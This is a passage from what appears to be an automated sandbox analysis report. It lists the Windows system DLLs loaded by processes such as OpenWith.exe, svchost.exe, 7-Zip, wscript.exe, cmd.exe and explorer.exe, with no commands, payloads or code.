Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinui.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.appdefaults.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: thumbcache.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: tiledatarepository.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: staterepository.core.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.staterepository.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: directmanipulation.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usosvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: updatepolicy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usocoreps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usoapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: thumbcache.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: workfoldersshell.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: shacct.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: idstore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: acppage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wlidprov.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: provsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll Jump to behavior
